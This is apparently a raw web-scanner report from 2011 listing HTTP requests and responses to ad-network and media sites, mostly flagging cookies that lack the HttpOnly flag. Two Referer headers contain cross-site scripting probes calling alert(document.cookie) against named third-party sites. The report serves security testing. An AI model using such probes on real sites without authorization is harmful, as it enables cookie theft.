HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:35 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/287065754/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:36 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/296652509/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 01:21:52 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /goiframe/184054348/262582811/direct/01 HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:06:50 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /goiframe/199711109/299297287/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:45:45 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666 HTTP/1.1 Host: context3.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.newsvine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 15:05:02 GMT Server: Barista/1.1-(eanhbg) Connection: Close Content-Length: 3242 Content-Type: text/html P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: vi_1.011=129639990201622008000000106049048; domain=.kanoodle.com; path=/; expires=Mon, 30-Jan-2012 15:05:02 GMT Set-Cookie: fc_ms_1.3=AA; domain=.kanoodle.com; path=/; expires=Sun, 06-Feb-2011 15:05:02 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601 HTTP/1.1 Host: conveu.admailtiser.com Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFgeo=5386156;expires=Sun, 29 Jan 2012 23:16:32 GMT;domain=.zedo.com;path=/;
FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: deals.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:01 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=af553d4f97984ae69ffeb82fbcef5634; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=DAFE261BA5894DCFB4A71871ED1DEC9A; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:01 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight2d710%2522%253balert(document.cookie)%2F%2F68483822cd8&r=http%3A%2F%2Fburp%2Fshow%2F21 HTTP/1.1 Host: dg.specificclick.net Proxy-Connection: keep-alive Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adp=79jE^0^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=79jE^0^0; ug=uosDj9Liw_xRTA
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate Cache-Control: post-check=0,pre-check=0 Pragma: no-cache p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: adp=79jE^0^4095; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ Set-Cookie: adf=79jE^0^0; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html Date: Sun, 30 Jan 2011 01:37:55 GMT Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: digitalnature.ro Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /projects/fusion HTTP/1.1 Host: digitalnature.ro Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:29:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 171 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
<!-- Segment Pixel ... Farmers_Brand_Exposed - DO NOT MODIFY --> <img src="http://ib.adnxs.com/seg?add=81825&t=2" width="1" height="1" /> <!-- End of Segment Pixel -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /f?c=163&k=keyword+targeting,paid+inclusion,paid+placement,ppc,pay+per+click,cpc,pay+for+placement,pay+for+ranking,kanoodle,bid+for+location,cost+per+click,pay+for+performance,trusted+feed,deep+web,invisible+web,xml+feed,search+engine+marketing,search,search+engine,search+engine+keyword+discovery,sponsored+links HTTP/1.1 Host: domdex.com Proxy-Connection: keep-alive Referer: http://www.kanoodle.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: dex=1; k=mass+texting-107-1296236614_
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:25 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, no-cache Set-Cookie: k=keyword+targeting%2Cpaid+inclusion%2Cpaid+placement%2Cppc%2Cpay+per+click%2Ccpc%2Cpay+for+placement%2Cpay+for+ranking%2Ckanoodle%2Cbid+for+location%2Ccost+per+click%2Cpay+for+performance%2Ctrusted+feed%2Cdeep+web%2Cinvisible+web%2Cxml+feed%2Csearch+engine+marketing%2Csearch%2Csearch+engine%2Csearch+engine+keyword+discovery%2Csponsored+links-163-1296399205.mass+texting-107-1296236614_; expires=Sat, 30-Apr-2011 14:53:25 GMT Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: earthsky.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2 Content-Type: text/html; charset=UTF-8 Date: Sun, 30 Jan 2011 02:08:12 GMT X-Pingback: http://earthsky.org/xmlrpc.php Connection: close Set-Cookie: X-Mapping-nollkmcj=4EAA623C76FDF55310FACF40BC17B580; path=/ Content-Length: 50113
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:08 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 44823
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /articles/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:04 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=69ea214e2db949c1adb4b09535432079; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=768421AB2A474F75A2A0356E76F9A868; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 39091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blogs/autosblog.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:07 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 52512
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /media/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:05 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA52 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=7f39811ff05647408c8faea3cdd2f40e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=7A4C72BC26CB4E3EB7E637ACF81B2D78; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:05 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 37381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /media/video/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:06 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=1b6d9a1169d84117806825e1245e514d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=282B2494452D4EF08780001B5E10E010; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:06 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 18476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /new-cars/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:02 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=ff89ea3264c14793bcb0990ab84276b0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=F28B3EDBC5D6441D845D4C4460CEA484; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:02 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 38329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /slideshow.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:09 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 36444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /used-cars/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:04 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=0f2992fc55e64374a8de46d105ca4355; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8E803F046F9B48FC80C03D86EE3DD45F; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /z/8277/adzerk1_2_4_43,adzerk2_2_17_45?keywords=php,facebook,iframe,facebook-like HTTP/1.1 Host: engine2.adzerk.net Proxy-Connection: keep-alive Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 30 Jan 2011 15:12:42 GMT Server: Microsoft-IIS/6.0 Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 2200 Connection: keep-alive
function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /z/8277/adzerk2_2_17_45 HTTP/1.1 Host: engine2.adzerk.net Proxy-Connection: keep-alive Referer: http://stackoverflow.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 51392 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:12 GMT Connection: close
